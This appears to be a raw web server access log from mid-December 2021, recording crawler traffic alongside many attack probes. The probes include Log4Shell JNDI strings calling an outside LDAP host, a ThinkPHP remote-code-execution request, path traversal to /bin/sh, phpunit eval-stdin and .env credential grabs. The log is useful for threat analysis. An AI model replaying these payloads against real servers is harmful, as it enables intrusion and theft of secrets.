66.240.236.116 - - [15/Dec/2021:01:06:08 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 zgrab/0.x" 77.74.177.119 - - [15/Dec/2021:01:22:55 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36" 34.96.130.24 - - [15/Dec/2021:01:44:56 +0100] "GET / HTTP/1.1" 301 394 "-" "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" 192.241.212.131 - - [15/Dec/2021:02:05:33 +0100] "GET /owa/auth/logon.aspx HTTP/1.1" 301 314 "-" "Mozilla/5.0 zgrab/0.x" 195.54.160.149 - - [15/Dec/2021:02:05:35 +0100] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 301 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 192.241.207.72 - - [15/Dec/2021:02:06:26 +0100] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 301 348 "-" "Mozilla/5.0 zgrab/0.x" 198.199.95.200 - - [15/Dec/2021:02:08:02 +0100] "GET /owa/auth/x.js HTTP/1.1" 301 310 "-" "Mozilla/5.0 zgrab/0.x" 195.54.160.149 - - [15/Dec/2021:02:31:44 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 301 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 20.212.3.206 - - [15/Dec/2021:02:44:11 +0100] "GET / HTTP/1.1" 301 379 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36" 183.136.225.9 - - [15/Dec/2021:02:51:15 +0100] "GET / HTTP/1.1" 301 383 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" 183.136.225.9 - - [15/Dec/2021:02:51:47 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" 183.136.225.9 - - [15/Dec/2021:02:52:01 +0100] "GET /robots.txt HTTP/1.1" 301 308 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" 195.54.160.149 - - [15/Dec/2021:03:20:59 +0100] "POST /mifs/.;/services/LogService HTTP/1.1" 301 318 "https://86.59.113.102:443" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 83.136.32.58 - - [15/Dec/2021:03:35:04 +0100] "HEAD / HTTP/1.0" 301 - "https://cert.at/de/services/statistic-survey/" "CERT.at-Statistics-Survey/1.0 (+http://www.cert.at/about/consec/content.html)" 192.241.211.149 - - [15/Dec/2021:04:03:20 +0100] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 301 348 "-" "Mozilla/5.0 zgrab/0.x" 192.241.212.19 - - [15/Dec/2021:04:18:56 +0100] "GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1" 301 335 "-" "Mozilla/5.0 zgrab/0.x" 131.220.6.152 - - [15/Dec/2021:04:53:48 +0100] "GET / HTTP/1.1" 301 295 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 106.122.206.21 - - [15/Dec/2021:05:04:09 +0100] "GET /wp-content/plugins/ioptimization/IOptimize.php?rchk= HTTP/1.1" 301 429 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36" 195.54.160.149 - - [15/Dec/2021:05:08:26 +0100] "GET /console/ HTTP/1.1" 301 307 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 106.122.206.21 - - [15/Dec/2021:06:00:26 +0100] "GET /wp-content/plugins/ioptimizations/IOptimizes.php?hamlorszd= HTTP/1.1" 301 436 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36" 185.142.236.43 - - [15/Dec/2021:06:16:02 +0100] "GET / HTTP/1.1" 301 383 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" 185.142.236.43 - - [15/Dec/2021:06:16:56 +0100] "" 400 379 "-" "-" 185.142.236.43 - - [15/Dec/2021:06:17:02 +0100] "" 400 379 "-" "-" 185.142.236.43 - - [15/Dec/2021:06:17:02 +0100] "" 400 379 "-" "-" 185.142.236.43 - - [15/Dec/2021:06:17:06 +0100] "quit" 400 379 "-" "-" 185.142.236.43 - - [15/Dec/2021:06:17:12 +0100] "GET /robots.txt HTTP/1.1" 301 393 "-" "-" 185.142.236.43 - - [15/Dec/2021:06:17:13 +0100] "GET /sitemap.xml HTTP/1.1" 301 394 "-" "-" 185.142.236.43 - - [15/Dec/2021:06:17:13 +0100] "GET /.well-known/security.txt HTTP/1.1" 301 407 "-" "-" 185.142.236.43 - - [15/Dec/2021:06:17:16 +0100] "GET /favicon.ico HTTP/1.1" 301 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0" 185.142.236.43 - - [15/Dec/2021:06:17:18 +0100] "" 400 379 "-" "-" 162.142.125.41 - - [15/Dec/2021:06:24:32 +0100] "GET / HTTP/1.1" 301 383 "-" "-" 162.142.125.41 - - [15/Dec/2021:06:24:32 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 193.106.29.210 - - [15/Dec/2021:06:48:32 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" 124.224.87.11 - - [15/Dec/2021:07:00:12 +0100] "GET / HTTP/1.1" 301 383 "-" "curl/7.58.0" 124.224.87.11 - - [15/Dec/2021:07:00:14 +0100] "GET / HTTP/1.1" 301 383 "-" "curl/7.58.0" 124.224.87.11 - - [15/Dec/2021:07:00:15 +0100] "GET / HTTP/1.1" 301 383 "-" "curl/7.58.0" 124.224.87.11 - - [15/Dec/2021:07:00:17 +0100] "GET / HTTP/1.1" 301 383 "-" "curl/7.58.0" 195.54.160.149 - - [15/Dec/2021:07:12:06 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 106.122.206.21 - - [15/Dec/2021:07:58:32 +0100] "GET /wp-content/plugins/kaswara/front/assets/css/style.css HTTP/1.1" 301 430 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36" 195.54.160.149 - - [15/Dec/2021:09:26:12 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 293 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 207.46.13.127 - - [15/Dec/2021:10:21:13 +0100] "GET / HTTP/1.1" 301 304 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" 128.1.248.42 - - [15/Dec/2021:10:27:50 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 67.205.158.245 - - [15/Dec/2021:11:43:41 +0100] "GET /users/sign_in HTTP/1.1" 301 396 "-" "-" 51.222.253.12 - - [15/Dec/2021:12:45:17 +0100] "GET /robots.txt HTTP/1.1" 301 304 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" 54.36.148.134 - - [15/Dec/2021:12:45:18 +0100] "GET / HTTP/1.1" 301 297 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" 184.105.247.194 - - [15/Dec/2021:12:54:31 +0100] "GET / HTTP/1.1" 301 383 "-" "-" 66.249.66.201 - - [15/Dec/2021:13:34:31 +0100] "GET /robots.txt HTTP/1.1" 301 303 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.66.156 - - [15/Dec/2021:13:34:32 +0100] "GET / HTTP/1.1" 301 296 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 192.241.211.154 - - [15/Dec/2021:13:48:01 +0100] "GET /actuator/health HTTP/1.1" 301 310 "-" "Mozilla/5.0 zgrab/0.x" 103.247.21.18 - - [15/Dec/2021:14:01:38 +0100] "GET /users/sign_in HTTP/1.1" 301 396 "-" "-" 60.217.75.69 - - [15/Dec/2021:14:09:11 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0" 66.249.66.201 - - [15/Dec/2021:15:17:48 +0100] "GET /robots.txt HTTP/1.1" 301 303 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.66.76 - - [15/Dec/2021:15:17:48 +0100] "GET /fileadmin/templates/flash/player.swf?vid=36 HTTP/1.1" 301 325 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 51.222.253.8 - - [15/Dec/2021:15:49:01 +0100] "GET /robots.txt HTTP/1.1" 301 302 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" 54.36.149.27 - - [15/Dec/2021:15:49:04 +0100] "GET / HTTP/1.1" 301 295 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" 113.98.224.68 - - [15/Dec/2021:15:55:13 +0100] "GET / HTTP/1.1" 301 383 "-" "curl/7.58.0" 113.98.224.68 - - [15/Dec/2021:15:55:21 +0100] "GET / HTTP/1.1" 301 383 "-" "curl/7.58.0" 113.98.224.68 - - [15/Dec/2021:15:55:22 +0100] "GET / HTTP/1.1" 301 383 "-" "curl/7.58.0" 113.98.224.68 - - [15/Dec/2021:15:55:22 +0100] "GET / HTTP/1.1" 301 383 "-" "curl/7.58.0" 167.248.133.60 - - [15/Dec/2021:16:34:54 +0100] "GET / HTTP/1.1" 301 383 "-" "-" 167.248.133.60 - - [15/Dec/2021:16:34:55 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 109.237.103.123 - - [15/Dec/2021:17:54:16 +0100] "GET /.env HTTP/1.1" 301 304 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 109.237.103.123 - - [15/Dec/2021:17:54:17 +0100] "POST /.env HTTP/1.1" 301 304 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 128.14.134.134 - - [15/Dec/2021:19:24:46 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 146.56.148.181 - - [15/Dec/2021:20:27:59 +0100] "GET /${jndi:ldap://185.224.139.151:1389/Exploit} HTTP/1.1" 301 430 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox" 146.56.148.181 - - [15/Dec/2021:20:28:01 +0100] "GET / HTTP/1.1" 301 383 "-" "${jndi:ldap://185.224.139.151:1389/Exploit}" 146.56.148.181 - - [15/Dec/2021:20:28:04 +0100] "POST /login HTTP/1.1" 301 388 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox" 146.56.148.181 - - [15/Dec/2021:20:28:05 +0100] "GET / HTTP/1.1" 301 383 "-" "curl/7.58.0" 207.46.13.127 - - [15/Dec/2021:20:37:24 +0100] "GET / HTTP/1.1" 301 304 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" 138.246.253.24 - - [15/Dec/2021:21:20:45 +0100] "GET /robots.txt HTTP/1.1" 301 393 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" 208.100.26.249 - - [15/Dec/2021:21:21:48 +0100] "GET / HTTP/1.1" 301 297 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.61 Safari/537.36" 208.100.26.233 - - [15/Dec/2021:21:21:48 +0100] "GET / HTTP/1.1" 301 298 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4217.2 Safari/537.36" 195.54.160.149 - - [15/Dec/2021:21:33:03 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 301 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 178.62.208.238 - - [15/Dec/2021:21:50:24 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36" 195.54.160.149 - - [15/Dec/2021:21:51:33 +0100] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 301 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 83.136.32.58 - - [15/Dec/2021:22:56:11 +0100] "HEAD / HTTP/1.0" 301 - "https://cert.at/de/services/statistic-survey/" "CERT.at-Statistics-Survey/1.0 (+http://www.cert.at/about/consec/content.html)" 195.54.160.149 - - [15/Dec/2021:23:07:06 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 301 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 137.226.113.44 - - [15/Dec/2021:23:14:19 +0100] "GET / HTTP/1.1" 301 308 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0" 195.54.160.149 - - [15/Dec/2021:23:24:34 +0100] "POST /mifs/.;/services/LogService HTTP/1.1" 301 318 "https://86.59.113.102:443" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 185.180.143.8 - - [15/Dec/2021:23:49:17 +0100] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 106.75.223.168 - - [15/Dec/2021:23:59:45 +0100] "GET / HTTP/1.0" 301 383 "-" "-" 109.237.103.38 - - [16/Dec/2021:00:35:05 +0100] "GET /.env HTTP/1.1" 301 304 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 109.237.103.38 - - [16/Dec/2021:00:35:06 +0100] "POST /.env HTTP/1.1" 301 304 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 195.54.160.149 - - [16/Dec/2021:00:49:12 +0100] "GET /console/ HTTP/1.1" 301 307 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 130.211.54.158 - - [16/Dec/2021:00:56:01 +0100] "GET / HTTP/1.1" 301 301 "-" "python-requests/2.26.0"